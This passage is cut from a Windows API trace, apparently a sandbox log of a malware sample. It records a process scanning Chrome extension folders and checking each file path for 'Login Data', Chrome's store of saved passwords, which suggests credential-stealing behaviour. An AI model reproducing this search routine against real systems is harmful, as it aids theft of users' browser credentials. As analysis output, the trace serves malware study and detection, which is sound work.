AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.695] GetProcessHeap () returned 0x8e0000 [0161.695] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.695] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655e890, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.695] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.695] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.695] GetProcessHeap () returned 0x8e0000 [0161.695] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.695] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.695] GetProcessHeap () returned 0x8e0000 [0161.695] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.695] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655f830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8655f830, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="fil", cAlternateFileName="")) returned 1 [0161.695] lstrcmpiW (lpString1="fil", lpString2=".") returned 1 [0161.695] lstrcmpiW (lpString1="fil", lpString2="..") returned 1 [0161.695] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.695] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.695] lstrlenW (lpString="\\") returned 1 [0161.695] GetProcessHeap () returned 0x8e0000 [0161.695] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.696] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.696] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.696] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.696] lstrlenW (lpString="fil") returned 3 [0161.696] GetProcessHeap () returned 0x8e0000 [0161.696] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x925dd8 [0161.696] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.696] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil" [0161.696] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.696] GetProcessHeap () returned 0x8e0000 [0161.696] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.696] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil") returned 138 [0161.696] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil") returned 138 [0161.696] lstrlenW (lpString="\\*.*") returned 4 [0161.696] GetProcessHeap () returned 0x8e0000 [0161.696] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11e) returned 0x91a0a8 [0161.696] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil" [0161.696] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\*.*" [0161.696] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655f830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8655f830, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.697] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.697] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655f830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8655f830, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.697] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.697] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.697] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655e890, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.697] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil") returned 138 [0161.697] lstrlenW (lpString="\\") returned 1 [0161.697] GetProcessHeap () returned 0x8e0000 [0161.697] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x118) returned 0x91b1d8 [0161.697] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil" [0161.697] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\" [0161.697] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\") returned 139 [0161.697] lstrlenW (lpString="messages.json") returned 13 [0161.697] GetProcessHeap () returned 0x8e0000 [0161.697] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x132) returned 0x91b2f8 [0161.697] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\" [0161.697] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" [0161.697] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.697] GetProcessHeap () returned 0x8e0000 [0161.697] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.697] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json", lpSrch="Login Data") returned 0x0 [0161.697] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.697] GetProcessHeap () returned 0x8e0000 [0161.697] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.698] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655e890, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.698] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.698] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.698] GetProcessHeap () returned 0x8e0000 [0161.698] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.698] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.698] GetProcessHeap () returned 0x8e0000 [0161.698] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.698] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655f830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8655f830, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="fr", cAlternateFileName="")) returned 1 [0161.698] lstrcmpiW (lpString1="fr", lpString2=".") returned 1 [0161.698] lstrcmpiW (lpString1="fr", lpString2="..") returned 1 [0161.698] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.698] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.698] lstrlenW (lpString="\\") returned 1 [0161.698] GetProcessHeap () returned 0x8e0000 [0161.698] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.698] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.698] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.698] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.698] lstrlenW (lpString="fr") returned 2 [0161.698] GetProcessHeap () returned 0x8e0000 [0161.698] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.698] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.698] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr" [0161.698] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.698] GetProcessHeap () returned 0x8e0000 [0161.698] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.698] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr") returned 137 [0161.698] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr") returned 137 [0161.698] lstrlenW (lpString="\\*.*") returned 4 [0161.698] GetProcessHeap () returned 0x8e0000 [0161.698] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.699] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr" [0161.699] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\*.*" [0161.699] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655f830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8655f830, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.699] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.699] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655f830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8655f830, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.699] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.699] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.699] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8655f830, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8655e890, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.699] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr") returned 137 [0161.699] lstrlenW (lpString="\\") returned 1 [0161.699] GetProcessHeap () returned 0x8e0000 [0161.699] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.699] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr" [0161.699] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\" [0161.699] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\") returned 138 [0161.699] lstrlenW (lpString="messages.json") returned 13 [0161.699] GetProcessHeap () returned 0x8e0000 [0161.699] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.699] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 